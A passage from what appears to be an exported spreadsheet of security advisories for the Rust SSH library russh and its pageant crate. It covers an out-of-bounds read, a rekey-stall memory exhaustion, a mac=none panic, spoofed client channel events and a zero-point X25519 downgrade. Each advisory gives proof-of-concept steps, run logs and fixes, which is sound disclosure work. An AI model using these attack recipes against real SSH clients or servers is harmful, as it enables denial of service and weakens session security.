- an **out-of-bounds read** past the 8 KiB view (access violation → process
  crash; or disclosure of adjacent process memory if the following page is
  committed)
- an allocation of up to **~4 GiB** from a single `u32` (`vec![0; n]`).
This was reproduced **end-to-end against the real, unmodified `pageant` crate**
(not a model) on `x86_64-pc-windows-gnu` under Wine; see "Proof of concept".
## Impact
- **Availability / DoS (reliable).** `MemoryMap::read(size)` walks off the end of
  the 8192-byte view and faults on the next, unmapped page — an
  `EXCEPTION_ACCESS_VIOLATION` that crashes the russh SSH client. Independently,
  a `size` near `u32::MAX` drives a ~4 GiB `vec![0; n]` before any copy.
- **Confidentiality (conditional).** If memory immediately after the mapped view
  happens to be committed, `read` returns those adjacent bytes to russh as the
  "agent response", which russh then parses as agent identities/signatures. This
  arm depends on process memory layout, so it is opportunistic; the crash/alloc
  is the deterministic outcome.
- **Trust boundary.** russh locates the agent with
  `FindWindowW("Pageant", "Pageant")` and passes the shared-mapping name inside
  the `WM_COPYDATA` `COPYDATASTRUCT`. **Any** local process can register a window
  of class + title `"Pageant"`, receive that name, open the same mapping, and
  write a hostile `size`. So an unprivileged local process impersonating Pageant
  can attack every russh-based SSH client that uses the Pageant agent.
## Affected component
- `pageant/src/wmmessage.rs`
  - `MemoryMap::read` (`:160-171`) — no bound (contrast `MemoryMap::write`
    `:139-158`, which returns `Error::Overflow` when `pos + len &gt; length`).
  - `query_pageant_direct` (`:199-237`) — reads a 4-byte `u32` size from the
    shared mapping (`:233`) and calls `map.read(size)` (`:234`) with no check
    against `_AGENT_MAX_MSGLEN` (8192).
- Reached from russh via `AgentClient::connect_pageant` → `PageantStream` →
  `query_pageant_direct`.
Platform: **Windows only** (`cfg(windows)`), local attacker. Verified against
the `pageant` crate **v0.2.2** as shipped in russh **v0.63.1** (`d3ae702`, the
latest release). `read` has never had a bound in any revision
(`git log -p -- pageant/src/wmmessage.rs`).
## Details
```rust
fn write(&amp;mut self, data: &amp;[u8]) -&gt; Result&lt;(), Error&gt; {
    if self.pos + data.len() &gt; self.length {      // :140  BOUND PRESENT
        return Err(Error::Overflow);
    }
    ... copy_nonoverlapping(&amp;data[0], view+pos, data.len()) ...
}
fn read(&amp;mut self, n: usize) -&gt; Vec&lt;u8&gt; {         // :160  NO BOUND
    let out = vec![0; n];                         // n up to 0xFFFF_FFFF (CWE-789)
    unsafe {
        std::ptr::copy_nonoverlapping(
            self.view.Value.add(self.pos) as *const u8,   // view is length==8192
            out.as_ptr() as *mut u8,
            n,                                    // reads n bytes, may run past the view (CWE-125)
        );
    }
    self.pos += n;
    out
}
```
`query_pageant_direct` creates the mapping at `_AGENT_MAX_MSGLEN = 8192`, writes
the request, sends the `WM_COPYDATA`, then reads the response the peer wrote:
```rust
map.seek(0);
let mut buf = map.read(4);
let size = u32::from_be_bytes([buf[0],buf[1],buf[2],buf[3]]) as usize; // :233 peer-controlled
buf.extend(map.read(size));                                            // :234 unbounded
```
Nothing checks `4 + size &lt;= 8192`, so `map.read(size)` runs past the 8 KiB view.
## Proof of concept
Because the bug is Windows-only (`WM_COPYDATA` + `MapViewOfFile`), the PoC is a
Windows cross-build (`x86_64-pc-windows-gnu`) driven under **Wine**, entirely
inside a Linux container. It exercises the **real, unmodified** crate: the PoC
takes a path dependency on `pageant` and calls
`pageant::wmmessage::query_pageant_direct`, exactly what
`AgentClient::connect_pageant` uses. A second thread impersonates Pageant
(registers the window class + title `"Pageant"`) and, on `WM_COPYDATA`, opens
the shared mapping russh created and writes an attacker-chosen 4-byte
big-endian length.
`poc/run.sh` builds and runs it. Full log in `results/e2e-wine-run.log`:
```
======== LEG 1 — ATTACK: fake agent reports length 0x00080000 (512 KiB) &gt;&gt; 8192-byte view ========
[attacker] impersonating Pageant window is up (class+title "Pageant")
[victim ] calling pageant::wmmessage::query_pageant_direct() over the 8192-byte view ...
[attacker] WM_COPYDATA received; shared mapping = "PageantRequestpoc"
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
wine: Unhandled page fault on read access to 0000000002092000 at address 00000002282CFDC4 ...
WINE-EXIT=5
======== LEG 2 — CONTROL: fake agent reports length 0x00000010 (16 B), in-bounds ========
[victim ] returned 20 bytes — request+response fit inside the 8192-byte view (in-bounds control); no fault
WINE-EXIT=0
```
- **LEG 1 (attack)**: an oversized `size` makes `MemoryMap::read` read past the
  8192-byte view; Wine reports an unhandled page fault at a page-aligned address
  (`0x…2092000`) — the out-of-bounds read as an access violation (crash). Exit
  code 5 = `STATUS_ACCESS_VIOLATION`.
- **LEG 2 (control)**: an in-bounds `size` returns cleanly. Same code path; the
  only difference is whether the peer's length exceeds the view — isolating the
  missing bound.
**Fix validation.** With `patch/pageant-read-bound.patch` applied and the PoC
rebuilt against the patched crate, the identical attack input is rejected
(`results/patched-wine-run.log`):
```
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
[victim ] query_pageant_direct error: Overflow
WINE-EXIT=0
```
No fault; the read is refused at the bound, exactly as `write` already refuses
oversize writes. (A pure-logic Linux model of the same control flow is also
included as `poc/pageant_read_oob_demo.rs` / `results/logic-demo-run.log`.)
## Remediation
Mirror `write`'s guard in `read` and validate the response length before
allocating/copying. `patch/pageant-read-bound.patch`:
- `MemoryMap::read(n)` returns `Result&lt;Vec&lt;u8&gt;, Error&gt;` and returns
  `Error::Overflow` when `self.pos + n &gt; self.length`;
- `query_pageant_direct` propagates that `Result` and additionally rejects
  `size &gt; _AGENT_MAX_MSGLEN - 4` before `map.read(size)`.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102820</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102821</t>
        </is>
      </c>
      <c r="D122" s="5" t="inlineStr"/>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="inlineStr"/>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M122" s="5" t="inlineStr">
        <is>
          <t>0.63.2</t>
        </is>
      </c>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr"/>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>## Summary
A russh **server** can be driven to unbounded heap growth (process OOM / kill) by
a peer that speaks only standard SSH messages, in the **default configuration**.
The peer starts a key re-exchange (sends `SSH_MSG_KEXINIT`) but never sends the
follow-up `SSH_MSG_KEX_ECDH_INIT`, leaving the server's kex state machine in
`SessionKexState::InProgress` **indefinitely**. While a rekey is in progress the
server's three message-drain paths are all gated off (`if !self.kex.active()`),
but the network-read path stays active, so every `SSH_MSG_CHANNEL_OPEN` the peer
sends is processed inline and appends one reply to an **unbounded** internal
queue (`priority_receiver`, an `UnboundedReceiver`) that is not dequeued until
the rekey completes. Because the peer decides whether the rekey ever completes,
the queue — and the server's memory — grows without bound.
This is reproducible end-to-end against a real russh server over a real
encrypted transport; see "Proof of concept". A one-line negative control (same
flood, no rekey) keeps memory flat, isolating the rekey window as the sole
trigger.
## Impact
- **Availability / DoS.** Server RSS climbs at roughly 3.3 KB per
  `CHANNEL_OPEN`, driven entirely by the peer, until the process is OOM-killed.
  In the reproduction one connection pushed the server from ~4 MB to **2.57 GB**
  (and past **4.8 GB** against the stock `echoserver` example) and it was still
  climbing when the flood was stopped.
- **Reached with standard messages, no special configuration.** Any handler is
  affected, including one that rejects every channel (the reply enqueued on
  rejection is exactly what accumulates). There is no per-connection cap on
  in-flight channel opens or on the queue, and the queue's sender has no
  backpressure.
- The peer keeps the connection alive simply by continuing to send, so the
  inactivity timer never fires.
## Affected component
- `russh/src/server/session.rs` — `Session::run` `tokio::select!` loop. The
  network-read arm is ungated; the three drain paths are gated on
  `!self.kex.active()`.
- `russh/src/server/mod.rs` — `reply()` routes a non-kex message received during
  a rekey straight to `server_read_encrypted` (inline processing).
- `russh/src/lib_inner.rs` — `ChannelOpenHandleInner`'s `accept`/`reject`/`Drop`
  all `send` a reply on an `UnboundedSender`.
Verified on **v0.63.1** (commit `d3ae702`), which is the latest release. The
gating logic predates it.
## Details
`Session::run` (`russh/src/server/session.rs:631`) drives a `tokio::select!`
(`:713`). Three of its message-drain sites are gated on `!self.kex.active()`:
- the pre-`select!` batch drain of `priority_receiver`/`receiver`
  (`session.rs:680`),
- the `priority_receiver.recv()` arm (`session.rs:762`),
- the `receiver.recv()` arm (`session.rs:770`, which also holds the only other
  `priority_receiver` drain at `:777`).
The fourth arm, `r = &amp;mut reading` (`session.rs:714`), is **ungated**: it reads
and processes one incoming packet every loop iteration regardless of rekey
state, calling `reply()` (`server/mod.rs:1128`).
During a **rekey**, `session.common.encrypted.is_some()`, so the strict-kex
message-ordering guard (`server/mod.rs:1143`, which is additionally gated on
`encrypted.is_none()`) does **not** apply. A non-kex message therefore falls
through `reply()` to `session.server_read_encrypted(handler, pkt)`
(`server/mod.rs:1232`) and is handled inline. For `SSH_MSG_CHANNEL_OPEN` this
reaches the channel-open handling, which hands the application a
`ChannelOpenHandle`.
Whether the handler accepts or (the trait default) rejects, the handle's
`accept` / `reject` / `Drop` all `send` a `Msg::ChannelOpenReply` on an
`UnboundedSender` (`russh/src/lib_inner.rs:560-603`; `Drop` sends
`AdministrativelyProhibited` at `:594-603`). That sender feeds
`priority_receiver`, declared `UnboundedReceiver&lt;Msg&gt;` (`session.rs:23`) and
created with `tokio::sync::mpsc::unbounded_channel()` (`session.rs:1522`). Its
only drain sites are the three arms gated off during the rekey. So each
`CHANNEL_OPEN` processed during the rekey window appends one reply (carrying a
`PendingChannelOpen` = channel params + mpsc `ChannelRef` + ids, a few KB
retained in practice) to a queue that is never dequeued.
Two facts make this unbounded and remote:
1. The server enters `InProgress` the moment it receives the peer's `KEXINIT`
   (`server/mod.rs:1153-1158`, `begin_rekey`) and only leaves it upon receiving
   the peer's `KEX_ECDH_INIT`. **The peer decides** whether to ever send that,
   so the window is attacker-held.
2. There is no per-connection cap on channels or on the priority queue, and the
   sender is unbounded (no backpressure).
### Root cause
The intended design was to *buffer* packets received during a rekey and replay
them afterwards: the fields `pending_reads: Vec&lt;Vec&lt;u8&gt;&gt;` and `pending_len: u32`
(`session.rs:26-27`) exist and are **drained** at kex completion
(`server/mod.rs:1194-1198`). But nothing ever **pushes** to `pending_reads` or
increments `pending_len` (they are dead — confirmed by grep across
`russh/src/`). Instead of being buffered, channel messages received during a
rekey are processed inline, and their replies pile up in the unbounded
`priority_receiver`. The missing piece is a bound on — or bounded deferral of —
channel processing while `kex.active()`.
## Proof of concept
Everything runs inside a container; nothing touches the host.
**Lab.** `poc/Dockerfile` builds `russh-lab:head` from Eugeny/russh @ `d3ae702`
(v0.63.1), default features (rust 1.91). A raw-SSH-client PoC
(`poc/poc_rekey_dos.rs`) implements curve25519-sha256 / ssh-ed25519 /
aes256-ctr / hmac-sha2-256 by hand, completes the handshake and a `publickey`
auth, then:
1. sends `SSH_MSG_KEXINIT` (server enters `kex.active()`),
2. **never** sends `KEX_ECDH_INIT` (rekey stalls, attacker-held),
3. floods `SSH_MSG_CHANNEL_OPEN`.
A minimal server (`poc/poc_server.rs`) uses the **trait-default**
`channel_open_session` (which rejects by dropping the handle), so the measured
growth is purely the undrained priority queue, not accepted-channel state.
`poc/run.sh` runs the attack leg and an identical **negative control** with no
rekey. Fresh run inside the lab, `N = 800,000` opens
(`results/rerun-2026-08-29.log`):
```
=== ATTACK (rekey stall) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s  server_RSS=667760KB
  t=4s  server_RSS=1599600KB
  t=6s  server_RSS=2556016KB
  t=8s  server_RSS=2566256KB   (flood done; memory retained)
=== CONTROL (no rekey) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s..t=12s  server_RSS=4208KB   (flat throughout)
```
- **ATTACK**: RSS `4,208 KB → 2,566,256 KB` (~2.57 GB) and retained after the
  flood ends — ~3.3 KB per `CHANNEL_OPEN`, attacker-driven. (An earlier canonical
  run reached 2.7 GB at 800k opens, and past 4.8 GB against the stock
  `echoserver` example at 1.5 M opens — see `results/canonical-run.log`.)
- **CONTROL**: RSS flat at `4,208 KB`. Without the rekey window the replies are
  drained normally; TCP backpressure (the client never reads the failure
  replies) even throttles the flood.
The control isolates the rekey window as the sole trigger. Both legs exercise
the real server entry point (`Session::run` → `reply` → `server_read_encrypted`)
over a real encrypted transport.
Reproduce: `C=russh-lab N=800000 ./poc/run.sh` (see `poc/POC-README.md`).
## Remediation
The priority queue carries locally generated channel-open replies, which are
non-kex messages the server **must not send** during a rekey anyway (RFC 4253
§7.1). So the fix is to bound how much channel work is done during a rekey, not
to drain the queue mid-rekey. Any of:
- **(recommended, minimal)** cap the number of non-kex messages processed while a
  rekey is in progress and disconnect a peer that exceeds it. A stalled/abusive
  rekey is then torn down after a small constant instead of growing memory
  without bound. See `patch/rekey-message-cap.patch` (a ~10-line change local to
  `Session::run`, validated in the lab — the attack leg is disconnected after the
  cap and RSS stays flat; a normal rekey, which completes in one round trip, is
  unaffected).
- bound / deferred-buffer channel messages during a rekey using the existing
  (currently dead) `pending_reads`/`pending_len` machinery, with a hard cap.
- bound the number of in-flight channel opens per connection and reject beyond it.
OpenSSH does not service new channels mid-kex; matching that intent closes the
whole family.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102821</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102822</t>
        </is>
      </c>
      <c r="D123" s="5" t="inlineStr"/>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="inlineStr"/>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M123" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr"/>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SshBlockCipher` implementations (AES-CBC, AES-CTR, 3DES-CBC, etc.) report `needs_mac() == true`, meaning they are documented/intended to always be paired with a separate integrity MAC. However, key-exchange negotiation only checks `needs_mac()` inside the *fallback* branch of MAC algorithm selection (used when no common MAC algorithm exists). If both peers' preferred MAC lists simply contain `none` and it is successfully negotiated through the normal selection path, nothing rejects pairing `none` with a cipher that requires a MAC. Once negotiated, a single crafted packet from either peer causes `cipher::read()` to shrink an already-allocated buffer below the number of bytes it is about to index, causing a Rust slice-index-out-of-range panic and killing that connection's task.
### Details
In `russh/src/cipher/mod.rs`, `read()` for a block cipher:
1. Reads `packet_length_to_read_for_block_length()` bytes up front (16 bytes for any `SshBlockCipher`) into `buffer.buffer`.
2. Decrypts the first block to recover the plaintext packet-length field `len`.
3. Computes `buffer.len = len + cipher.tag_len()`.
4. Calls `buffer.buffer.resize(buffer.len + 4, 0)`.
5. Immediately indexes `buffer.buffer[16..]` (via the constant used for the first block read) to continue decrypting/reading the rest of the packet.
When the negotiated MAC is `none`, `tag_len() == 0`. If the attacker (or a MITM holding the session key, or simply the accepting peer testing a hostile client) sends a packet whose *decrypted* length field is `0`, then `buffer.len = 0` and `resize(0 + 4, 0)` **shrinks** the buffer that was already grown to 16 bytes in step 1 down to 4 bytes. The subsequent slice operation `buffer.buffer[16..]` then panics with `range start index 16 out of range for slice of length 4`.
The file already defines a `MINIMUM_PACKET_LEN` constant, but it is only consulted on the *write*/padding side, never on the read path — so nothing prevents an incoming packet from declaring a length shorter than the bytes already buffered.
Negotiation gap: `negotiation.rs`'s `Select` MAC-selection logic only special-cases `needs_mac()` when negotiation would otherwise *fail* (no common MAC), substituting `none` only if the cipher does not need one. It never re-validates the case where `none` is a common/successfully-negotiated MAC on both sides regardless of what the chosen cipher requires. So an application (or a malicious peer, since negotiation is attacker-influenced on one side) that includes `none` in its own preferred MAC list — while still allowing the default CTR/CBC cipher suite — ends up with an invalid, panic-inducing combination that the library itself should refuse.
### PoC
1. Configure one side's `Preferred` config to include `mac::NONE` in the MAC list (this is a supported, non-default configuration exposed by the crate's public `Preferred` API — used e.g. for legacy/interop compatibility), while leaving the default cipher list (which includes `aes256-ctr`/`aes256-cbc`) untouched.
2. Complete a normal key exchange; negotiation lands on `{cipher: aes*-ctr (or -cbc), mac: none}` because `none` is present and preferred/common on both sides, and nothing during negotiation rejects this pairing.
3. From the peer, send one transport packet whose decrypted packet-length field is `0` (trivial to construct once the session keys are known to that peer, or for the peer that legitimately owns the connection to simply hand-craft, e.g. a modified client for testing).
4. `cipher::read()` on the receiving side panics: `range start index 16 out of range for slice of length 4`.
5. Because each connection is handled in its own `tokio::spawn`'ed task (see the per-connection `select!` loop that calls into `cipher::read()`), the panic unwinds only that task by default, but it unconditionally terminates that SSH connection/session — a working, currently-unauthenticated, already-established connection is killed with no attacker interaction beyond the one crafted packet, and the check runs on every inbound packet including pre-auth ones.
### Impact
Denial of service: a remote peer that can influence MAC preference negotiation (or a MITM in possession of the session key) can crash any individual SSH connection/session that ends up negotiating a block cipher together with `mac=none`, with a single crafted packet, pre-authentication. This does not affect the process as a whole (panic is scoped to that connection's task under `panic=unwind`), and does require a non-default configuration that permits `none` as a preferred MAC — hence Low severity.
### Suggested fix
In the MAC-selection logic in `negotiation.rs`, reject (or force substitution of) `mac::NONE` whenever the negotiated cipher's `needs_mac()` is `true`, regardless of *how* `none` came to be selected — not only in the "no common MAC" fallback branch. Defensively, `cipher::read()` could also refuse to shrink a buffer below the number of bytes already consumed for the length-field block, returning a protocol error instead of resizing blindly.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102822</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102823</t>
        </is>
      </c>
      <c r="D124" s="5" t="inlineStr"/>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="inlineStr"/>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr"/>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-68930 was fixed by adding `Session::is_established_channel()` in `russh/src/server/encrypted.rs`, which gates every channel-scoped SERVER-side message (CHANNEL_REQUEST, CHANNEL_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_WINDOW_ADJUST, CHANNEL_EXTENDED_DATA) on `enc.channels.get(&amp;channel).is_some_and(|c| c.confirmed)` before invoking any `Handler` callback. The identical validation was never added to the CLIENT side (`russh/src/client/encrypted.rs`), which processes channel-scoped messages sent by the SSH SERVER once the client has authenticated.
### Details
In `client_read_authenticated` (`russh/src/client/encrypted.rs`, ~lines 431-757), for CHANNEL_DATA, CHANNEL_EXTENDED_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_OPEN_FAILURE, CHANNEL_SUCCESS, CHANNEL_FAILURE, and the CHANNEL_REQUEST sub-types exit-status/exit-signal/xon-xoff, the code only optionally forwards the event to the internal per-channel mpsc sender via `if let Some(chan) = self.channels.get(&amp;channel_num) { ... }` (a no-op if the channel is unknown), but then **unconditionally** calls the corresponding public `Handler` trait method (`client.data(...)`, `client.exit_status(...)`, `client.channel_close(...)`, `client.channel_success(...)`, etc.) regardless of whether `channel_num` corresponds to any channel the client ever opened or that was ever confirmed. Only CHANNEL_OPEN_CONFIRMATION (closes the connection with `Error::Inconsistent` if unknown) and CHANNEL_WINDOW_ADJUST (returns early with `Ok(())` if unknown) correctly validate channel existence before acting.
Corroborating evidence this check was intended but never wired up: `crate::Error` defines a dedicated `WrongChannel` variant documented as "Message received/sent on unopened channel" (`russh/src/lib_inner.rs`, ~line 144-146), yet a repo-wide search shows this variant is never constructed or returned anywhere in the codebase — dead code left over from (or intended for) exactly this validation.
Because `Session::new_channel_id()` (`russh/src/session.rs`, ~line 708) allocates channel IDs sequentially starting at 1, a malicious or compromised SSH server can trivially predict the ID of the client's next channel and inject spoofed lifecycle events for it before or interleaved with the real channel-open exchange, or replay events for already-closed channel IDs.
### PoC
Many real-world consumers of russh-as-a-client (deployment/orchestration tools, CI runners connecting to build/bastion hosts, git-over-ssh style tooling, database/tunnel clients) implement the `client::Handler` trait directly and key their own state (e.g. `HashMap&lt;ChannelId, CommandState&gt;`, exit-code trackers, per-channel byte counters, completion futures) off the channel IDs the library hands them, trusting the documented contract that events like "The remote process has exited" (`exit_status`) or "Called when the server closes a channel" (`channel_close`) only fire for a channel the application itself opened.
A malicious, MITM'd (via a compromised/rogue jump host the client is configured to trust), or simply hostile SSH server can send `SSH_MSG_CHANNEL_REQUEST` (exit-status/exit-signal), `SSH_MSG_CHANNEL_DATA`, `SSH_MSG_CHANNEL_CLOSE`, `SSH_MSG_CHANNEL_SUCCESS`/`FAILURE`, or `SSH_MSG_CHANNEL_OPEN_FAILURE` for an arbitrary/predicted/never-opened channel ID at any point after authentication completes. Because the library invokes the `Handler` callback unconditionally, this reaches application code with an ID it never registered.
### Impact
(1) A reliable, purely protocol-level trigger for an application panic/DoS in any client that indexes per-channel state by `ChannelId` without itself re-checking channel validity — the exact class of bug CVE-2026-68930 fixed server-side; and (2) lets the server spoof exit-status/exit-signal/close/success/failure notifications for a channel the client has not yet opened or has already released, desynchronizing the client's command-completion bookkeeping (e.g. reporting a forged exit code 0 for a not-yet-run remote command, or a premature `channel_close` before real output/exit-status has arrived) — a business-logic-level integrity violation of the SSH channel lifecycle that automation built on russh implicitly relies on.
Suggested fix: add the same `is_established_channel()`-style gate already used in `server/encrypted.rs` to `client/encrypted.rs`'s `client_read_authenticated`, checking `self.channels.get(&amp;channel_num)` before invoking any `Handler` callback (not just the mpsc forward), for every channel-scoped message type.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102823</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102824</t>
        </is>
      </c>
      <c r="D125" s="5" t="inlineStr"/>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="inlineStr"/>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M125" s="5" t="inlineStr">
        <is>
          <t>0.63.0</t>
        </is>
      </c>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr"/>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
The hybrid ML-KEM 768 + X25519 key exchange implementation in `russh/src/kex/hybrid_mlkem.rs` does not validate that the remote peer's X25519 public key is not the zero point (all-zero 32-byte value). This allows a remote peer to force the X25519 contribution to the combined shared secret to zero, reducing the hybrid KEX to a single-algorithm exchange.
Affected code at HEAD (v0.62.4, commit 0089c89):
**Server-side** (`server_dh`, lines 92-93):
```rust
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = s_secret * c_pk1;
```
**Client-side** (`compute_shared_secret`, lines 154-155):
```rust
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = x25519_secret * s_pk1;
```
## Root Cause
Commit a7fc1eb (2026-07-22, "fix mpint encoding and validate curve25519 keys") added zero-point validation to the standalone Curve25519 KEX in `russh/src/kex/curve25519.rs` at two locations:
- `server_dh` line 77: `if client_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
- `compute_shared_secret` line 122: `if remote_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
The same X25519 scalar multiplication pattern appears in `hybrid_mlkem.rs`, but the fix was not applied there.
## Proof of Concept
A malicious SSH client negotiating `mlkem768x25519-sha256` can send a KEX_HYBRID_INIT message containing a valid ML-KEM 768 encapsulation key followed by 32 zero bytes as the X25519 component.
When the server computes `k_cl = s_secret * c_pk1`, the result is the zero point regardless of the server's secret scalar. The combined shared secret `K = SHA-256(k_pq || k_cl)` then depends only on the ML-KEM component. The same attack works in reverse against a client connecting to a malicious server.
The zero X25519 public key passes all existing validation (the length check on line 78 succeeds since 32 bytes is correct). No panic or crash occurs - the exchange completes successfully with a weakened shared secret.
## Impact
The purpose of hybrid key exchange is defense-in-depth: if either the classical algorithm (X25519) or the post-quantum algorithm (ML-KEM 768) is broken, the combined secret remains secure. By injecting a zero X25519 public key, an attacker eliminates the classical contribution entirely, reducing security to depend solely on ML-KEM.
This matters in two scenarios:
1. If ML-KEM 768 is later found to have a weakness (the explicit threat model hybrid KEX is designed to mitigate), sessions where the X25519 component was zeroed out lose their fallback protection.
2. An active network attacker who can intercept KEX could downgrade the hybrid exchange to effectively single-algorithm security without either peer detecting it.
The severity is MEDIUM rather than HIGH because the ML-KEM component still provides strong security today, and an active attacker who can modify KEX messages can already perform other attacks unless strict KEX is negotiated.
## Suggested Fix
Add zero-point checks in `hybrid_mlkem.rs` matching the ones in `curve25519.rs`:
```rust
// In server_dh, after line 93:
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
if c_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
// In compute_shared_secret, after line 155:
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
if s_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
```
Ideally, also validate against the other small-subgroup points on Curve25519 (there are a small number of low-order points that also yield a zero shared secret), matching the comprehensive validation OpenSSH performs.
### AI tooling
AI assistancewas used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102824</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102825</t>
        </is>
      </c>
      <c r="D126" s="5" t="inlineStr"/>
